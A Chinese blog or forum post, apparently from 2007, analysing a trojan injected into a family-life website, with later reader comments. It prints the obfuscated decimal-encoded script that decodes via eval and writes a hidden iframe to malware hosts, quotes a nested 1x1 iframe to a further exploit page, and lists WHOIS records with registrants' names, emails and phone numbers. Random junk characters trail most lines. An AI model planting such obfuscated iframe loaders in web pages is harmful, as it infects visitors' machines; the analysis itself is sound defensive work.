[原创]一篇刚写的分析木马手记

首发在我的博客里面， GK@OdurAR  

w#"\*SKK  
http://www.areway.cn/?p=175 pQz1!0  
Vj*-E  
EQ1**[$  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： n!jmxl$  
          +jLy>=u  
<script>t=’60,105,102,114,97,109,101, G@8)3 @  
32,115,114,99,61,104,116,116,112,58,47,47, y4^u&0}0$  
102,114,101,101,46,117,45,117,117,117,46,99, G3.a
w  
110,47,101,114,114,111,114,46,104,116,109, `w@:h4f  
32,119,105,100,116,104,61,49,48,48,32,104, gaF6j!p  
101,105,103,104,116,61,48,62,60,47,105,102, <Ky-3:pxeM  
114,97,109,101,62′; WZ CI*'
 
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> Z vysLHj  
                                                                                                  a|ufm^F  
<script>t=’60,105,102,114,97,109,101,32,115, *6Wiq5M>.  
114,99,61,104,116,116,112,58,47,47,102,114, 1!#N-^qk  
101,101,46,117,45,117,117,117,46,99,110,47, `Q@7,z=f  
101,114,114,111,114,46,104,116,109,32,119, &
LLU@|  
105,100,116,104,61,49,48,48,32,104,101,105, &uq.k{<p\  
103,104,116,61,48,62,60,47,105,102,114,97, &K^0PzWWof  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); UC!mp?   
document.write(t);</script> tB_le>rhl  
                                                                                                  ai!u+L  
<html xmlns=” }icCp)b>v  
http://www.w3.org/1999/xhtml '/d
51  
“> pj>R9zpn_  
<head> KWJVc `  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> WTSh#L  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> yaUtDC.|  
<title>首页 - 爱生活家庭网 1NZ"\9=U  
                                                                                                                                                    E>~R P^?Uz  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 z0 "DbZ;d  
转换字符串后的大概内容是（谁点击后果自付）： _7Y h[I4  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… GP};~  
                                                                                                                                  c./\sN@  
查询玉米u-uuu.cn的详细信息： VvhfD2*T  
Domain Name: u-uuu.cn 1Bh"'9-!JT  
ROID: 20070901s10001s64972306-cn T ,lM(2S[  
Domain Status: ok }3Es&p$9  
Registrant Organization: 王雷 +3v)@18B1  
Registrant Name: 王雷 iN;Pg_Kq  
Administrative Email: czlovexs@126.com xGd60"w2  
Sponsoring Registrar: 北京万网志成科技有限公司 l<=;IMWd  
Name Server:ns.yovole.com 59E9K)c3  
Name Server:ns1.yovole.com s(,S~  
Registration Date: 2007-09-01 17:54 =ZgueUz,  
Expiration Date: 2008-09-01 17:54 iE%"Q? Q/  
最后PING了一下地址 都没有什么…. 3?93Pj3oPt  
                                                                                                {[y6qQm  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. g4?2'G5m?  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> O
a[  
<script language=”javascript” src=” R5HT EB  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script WgNA%.|,  
> C=?S  
这个玉米应该有可能是木马作者的： h<.5:a  
foafau.info的详细信息： (J:+'u  
Access to INFO WHOIS information is provided to assist persons in ]
!hjKu"  
determining the contents of a domain name registration record in the ]S2rqKB  
Afilias registry database. The data in this record is provided by )%(ZFn}   
Afilias Limited for informational purposes only, and Afilias does not u6|C3,!z"  
guarantee its accuracy.  This service is intended only for query-based M8},RR@{  
access. You agree that you will use this data only for lawful purposes ^C>kmo3J  
and that, under no circumstances will you use this data to: (a) allow, T;w:^XW  
enable, or otherwise support the transmission by e-mail, telephone, or Y>x{ [er  
facsimile of mass unsolicited, commercial advertising or solicitations @*;x1A-]V  
to entities other than the data recipient’s own existing customers; or CK_dEh2c  
(b) enable high volume, automated, electronic processes that send j7I=2xnTWu  
queries or data to the systems of Registry Operator, a Registrar, or R7::f\I   
Afilias except as reasonably necessary to register domain names or )_#V>cvNG  
modify existing registrations. All rights reserved. Afilias reserves 4_#$k{  
the right to modify these terms at any time. By submitting this query, 4I4m4^  
you agree to abide by this policy. Ob0sB@  
Domain ID:D22418703-LRMS M.}9)ho   
Domain Name:FOAFAU.INFO =G-OIu+H!U  
Created On:20-Nov-2007 16:05:42 UTC sW>
%mnx  
Last Updated On:20-Nov-2007 16:05:44 UTC fc#9e9R  
Expiration Date:20-Nov-2008 16:05:42 UTC {lI}a8DP  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) U:7h>Z0W  
Status:CLIENT DELETE PROHIBITED +){^HC\7h  
Status:CLIENT RENEW PROHIBITED l+ }=D@l  
Status:CLIENT TRANSFER PROHIBITED -E-#@s  
Status:CLIENT UPDATE PROHIBITED N_Us6X  
Status:TRANSFER PROHIBITED K?.~}82c  
Registrant ID:GODA-040110615 &PMQ]B  
Registrant Name:liu hong [gWeD  
Registrant Organization: a&s34Pd  
Registrant Street1:beijing kWzp*<lWe  
Registrant Street2: ~ 'ZwD/!e  
Registrant Street3: iI GK"}  
Registrant City:beijing *|rdR2R!  
Registrant State/Province: .UK0bxoa  
Registrant Postal Code:100000 2Bcc
E  
Registrant Country:CN WK%cbFq(  
Registrant Phone:+86.860108888777 =*UK!y?n  
Registrant Phone Ext.: ;d
Ik$_FN  
Registrant FAX: g]~vZj  
Registrant FAX Ext.: /T _M't@j  
Registrant Email:bbbshiji@163.com %i9S"  
Admin ID:GODA-240110615 ;,{_=n>  
Admin Name:liu hong E$"NOR  
Admin Organization: ~
j!n`#.\  
Admin Street1:beijing i"Jy>'  
Admin Street2: (4H\ho8+mp  
Admin Street3: T?3Q<[SmI  
Admin City:beijing J=A)]YE  
Admin State/Province: [S6u:;7  
Admin Postal Code:100000 _}[ Du/c  
Admin Country:CN }?[];FB  
Admin Phone:+86.860108888777 gM96RY  
Admin Phone Ext.: ]E9iaq6Z  
Admin FAX: |MNSIb&,W  
Admin FAX Ext.: rto?*^N?  
Admin Email:bbbshiji@163.com e@3SF  
Billing ID:GODA-340110615 !LKxZ"  
Billing Name:liu hong := V?;
  
Billing Organization: jz!I +  
Billing Street1:beijing M5bE5C  
Billing Street2: jCqz^5=$  
Billing Street3: teok*'b:  
Billing City:beijing 6[m~xegG  
Billing State/Province: H/a gt  
Billing Postal Code:100000 ^ :VH?I=  
Billing Country:CN CHnclT  
Billing Phone:+86.860108888777 K V5 '-Sv1  
Billing Phone Ext.: gT}H B.  
Billing FAX: 1AJ6NBC&c  
Billing FAX Ext.:
{B$CqsvJ  
Billing Email:bbbshiji@163.com 80nEQT y  
Tech ID:GODA-140110615 LnR>!0:c  
Tech Name:liu hong WwmYJl0  
Tech Organization: 'm<Lx _i  
Tech Street1:beijing =2!p>>t,d;  
Tech Street2: 0cm34\*  
Tech Street3: }Rh\JDiQ  
Tech City:beijing z5@XFaQ  
Tech State/Province: D]~K-[V?l  
Tech Postal Code:100000 |\(uO|)ju  
Tech Country:CN a`wjZ"}'[  
Tech Phone:+86.860108888777 [ycX)iM  
Tech Phone Ext.: |/,SNE  
Tech FAX: q9 Df`6+  
Tech FAX Ext.: p?gm=b#  
Tech Email:bbbshiji@163.com (~~m8VJ>  
Name Server:NS27.DOMAINCONTROL.COM w:\} B'u  
Name Server:NS28.DOMAINCONTROL.COM !5,C"r  
Name Server: n/9afIN  
Name Server: (T1< (YZ  
Name Server: V60L\?a  
Name Server: Q[OwP  
Name Server: .`D'eS6b  
Name Server: 0)&!$@HW  
Name Server: :8b'HhjM  
Name Server: #Y5k/NPg  
Name Server: GvVkb=="  
Name Server: _
c-3eQ1  
Name Server: f-~Y  
                                                                                                          >axeUd+@i  
接着下载每个文件里面的代码： w$ 8r<?^3  
一步一步看.. 3?
o4  
KVZB`c$<t  
R3B+vLGX  
qO{z{@jo55  
` GF w?G  
v,")XPY  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来